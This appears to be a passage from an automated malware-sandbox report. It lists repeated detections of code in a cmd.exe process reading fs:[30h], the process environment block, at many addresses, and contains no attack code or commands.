      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0F24A mov eax, dword ptr fs:[00000030h]15_2_03B0F24A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F247 mov eax, dword ptr fs:[00000030h]15_2_03B9F247
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B141BB mov ecx, dword ptr fs:[00000030h]15_2_03B141BB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B141BB mov eax, dword ptr fs:[00000030h]15_2_03B141BB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B141BB mov eax, dword ptr fs:[00000030h]15_2_03B141BB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB51B6 mov eax, dword ptr fs:[00000030h]15_2_03BB51B6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B131BE mov eax, dword ptr fs:[00000030h]15_2_03B131BE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B131BE mov eax, dword ptr fs:[00000030h]15_2_03B131BE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E1A4 mov eax, dword ptr fs:[00000030h]15_2_03B1E1A4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E1A4 mov eax, dword ptr fs:[00000030h]15_2_03B1E1A4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21190 mov eax, dword ptr fs:[00000030h]15_2_03B21190
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21190 mov eax, dword ptr fs:[00000030h]15_2_03B21190
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B09194 mov eax, dword ptr fs:[00000030h]15_2_03B09194
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4180 mov eax, dword ptr fs:[00000030h]15_2_03AE4180
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4180 mov eax, dword ptr fs:[00000030h]15_2_03AE4180
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4180 mov eax, dword ptr fs:[00000030h]15_2_03AE4180
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0F1F0 mov eax, dword ptr fs:[00000030h]15_2_03B0F1F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0F1F0 mov eax, dword ptr fs:[00000030h]15_2_03B0F1F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD81EB mov eax, dword ptr fs:[00000030h]15_2_03AD81EB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE91E5 mov eax, dword ptr fs:[00000030h]15_2_03AE91E5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE91E5 mov eax, dword ptr fs:[00000030h]15_2_03AE91E5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA81EE mov eax, dword ptr fs:[00000030h]15_2_03BA81EE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA81EE mov eax, dword ptr fs:[00000030h]15_2_03BA81EE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD91F0 mov eax, dword ptr fs:[00000030h]15_2_03AD91F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD91F0 mov eax, dword ptr fs:[00000030h]15_2_03AD91F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01F1 mov eax, dword ptr fs:[00000030h]15_2_03AF01F1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01F1 mov eax, dword ptr fs:[00000030h]15_2_03AF01F1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01F1 mov eax, dword ptr fs:[00000030h]15_2_03AF01F1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01C0 mov eax, dword ptr fs:[00000030h]15_2_03AF01C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01C0 mov eax, dword ptr fs:[00000030h]15_2_03AF01C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6A130 mov eax, dword ptr fs:[00000030h]15_2_03B6A130
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F13E mov eax, dword ptr fs:[00000030h]15_2_03B9F13E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B17128 mov eax, dword ptr fs:[00000030h]15_2_03B17128
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B17128 mov eax, dword ptr fs:[00000030h]15_2_03B17128
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE510D mov eax, dword ptr fs:[00000030h]15_2_03AE510D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10118 mov eax, dword ptr fs:[00000030h]15_2_03B10118
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B3717A mov eax, dword ptr fs:[00000030h]15_2_03B3717A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B3717A mov eax, dword ptr fs:[00000030h]15_2_03B3717A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6179 mov eax, dword ptr fs:[00000030h]15_2_03AE6179
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1716D mov eax, dword ptr fs:[00000030h]15_2_03B1716D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA147 mov eax, dword ptr fs:[00000030h]15_2_03ADA147
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA147 mov eax, dword ptr fs:[00000030h]15_2_03ADA147
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA147 mov eax, dword ptr fs:[00000030h]15_2_03ADA147
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB3157 mov eax, dword ptr fs:[00000030h]15_2_03BB3157
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB3157 mov eax, dword ptr fs:[00000030h]15_2_03BB3157
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB3157 mov eax, dword ptr fs:[00000030h]15_2_03BB3157
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1415F mov eax, dword ptr fs:[00000030h]15_2_03B1415F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB5149 mov eax, dword ptr fs:[00000030h]15_2_03BB5149
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB50B7 mov eax, dword ptr fs:[00000030h]15_2_03BB50B7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9B0AF mov eax, dword ptr fs:[00000030h]15_2_03B9B0AF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B200A5 mov eax, dword ptr fs:[00000030h]15_2_03B200A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADC090 mov eax, dword ptr fs:[00000030h]15_2_03ADC090
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA093 mov ecx, dword ptr fs:[00000030h]15_2_03ADA093
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1D0F0 mov eax, dword ptr fs:[00000030h]15_2_03B1D0F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1D0F0 mov ecx, dword ptr fs:[00000030h]15_2_03B1D0F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADC0F6 mov eax, dword ptr fs:[00000030h]15_2_03ADC0F6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB0D0 mov eax, dword ptr fs:[00000030h]15_2_03AFB0D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADD02D mov eax, dword ptr fs:[00000030h]15_2_03ADD02D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22010 mov ecx, dword ptr fs:[00000030h]15_2_03B22010
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE8009 mov eax, dword ptr fs:[00000030h]15_2_03AE8009
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B05004 mov eax, dword ptr fs:[00000030h]15_2_03B05004
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B05004 mov ecx, dword ptr fs:[00000030h]15_2_03B05004
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B89060 mov eax, dword ptr fs:[00000030h]15_2_03B89060
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6074 mov eax, dword ptr fs:[00000030h]15_2_03AE6074
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6074 mov eax, dword ptr fs:[00000030h]15_2_03AE6074
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7072 mov eax, dword ptr fs:[00000030h]15_2_03AE7072
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB505B mov eax, dword ptr fs:[00000030h]15_2_03BB505B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10044 mov eax, dword ptr fs:[00000030h]15_2_03B10044
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1051 mov eax, dword ptr fs:[00000030h]15_2_03AE1051
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1051 mov eax, dword ptr fs:[00000030h]15_2_03AE1051
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB17BC mov eax, dword ptr fs:[00000030h]15_2_03BB17BC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE07A7 mov eax, dword ptr fs:[00000030h]15_2_03AE07A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAD7A7 mov eax, dword ptr fs:[00000030h]15_2_03BAD7A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAD7A7 mov eax, dword ptr fs:[00000030h]15_2_03BAD7A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAD7A7 mov eax, dword ptr fs:[00000030h]15_2_03BAD7A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B11796 mov eax, dword ptr fs:[00000030h]15_2_03B11796
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B11796 mov eax, dword ptr fs:[00000030h]15_2_03B11796
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB781 mov eax, dword ptr fs:[00000030h]15_2_03BBB781
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB781 mov eax, dword ptr fs:[00000030h]15_2_03BBB781
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0E7E0 mov eax, dword ptr fs:[00000030h]15_2_03B0E7E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE77F9 mov eax, dword ptr fs:[00000030h]15_2_03AE77F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE77F9 mov eax, dword ptr fs:[00000030h]15_2_03AE77F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F7CF mov eax, dword ptr fs:[00000030h]15_2_03B9F7CF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B09723 mov eax, dword ptr fs:[00000030h]15_2_03B09723
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AED700 mov ecx, dword ptr fs:[00000030h]15_2_03AED700
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F717 mov eax, dword ptr fs:[00000030h]15_2_03B9F717
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA970B mov eax, dword ptr fs:[00000030h]15_2_03BA970B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA970B mov eax, dword ptr fs:[00000030h]15_2_03BA970B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE471B mov eax, dword ptr fs:[00000030h]15_2_03AE471B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE471B mov eax, dword ptr fs:[00000030h]15_2_03AE471B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0270D mov eax, dword ptr fs:[00000030h]15_2_03B0270D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0270D mov eax, dword ptr fs:[00000030h]15_2_03B0270D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0270D mov eax, dword ptr fs:[00000030h]15_2_03B0270D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10774 mov eax, dword ptr fs:[00000030h]15_2_03B10774
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF2760 mov ecx, dword ptr fs:[00000030h]15_2_03AF2760
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 mov eax, dword ptr fs:[00000030h]15_2_03B21763
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 mov eax, dword ptr fs:[00000030h]15_2_03B21763
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 mov eax, dword ptr fs:[00000030h]15_2_03B21763
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 mov eax, dword ptr fs:[00000030h]15_2_03B21763
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 mov eax, dword ptr fs:[00000030h]15_2_03B21763
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 mov eax, dword ptr fs:[00000030h]15_2_03B21763
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4779 mov eax, dword ptr fs:[00000030h]15_2_03AE4779
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4779 mov eax, dword ptr fs:[00000030h]15_2_03AE4779
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A750 mov eax, dword ptr fs:[00000030h]15_2_03B1A750
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B02755 mov eax, dword ptr fs:[00000030h]15_2_03B02755
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B02755 mov eax, dword ptr fs:[00000030h]15_2_03B02755
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B02755 mov eax, dword ptr fs:[00000030h]15_2_03B02755
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B02755 mov ecx, dword ptr fs:[00000030h]15_2_03B02755
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B02755 mov eax, dword ptr fs:[00000030h]15_2_03B02755
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B02755 mov eax, dword ptr fs:[00000030h]15_2_03B02755
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8E750 mov eax, dword ptr fs:[00000030h]15_2_03B8E750
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B13740 mov eax, dword ptr fs:[00000030h]15_2_03B13740
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF75B mov eax, dword ptr fs:[00000030h]15_2_03ADF75B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1174A mov eax, dword ptr fs:[00000030h]15_2_03B1174A
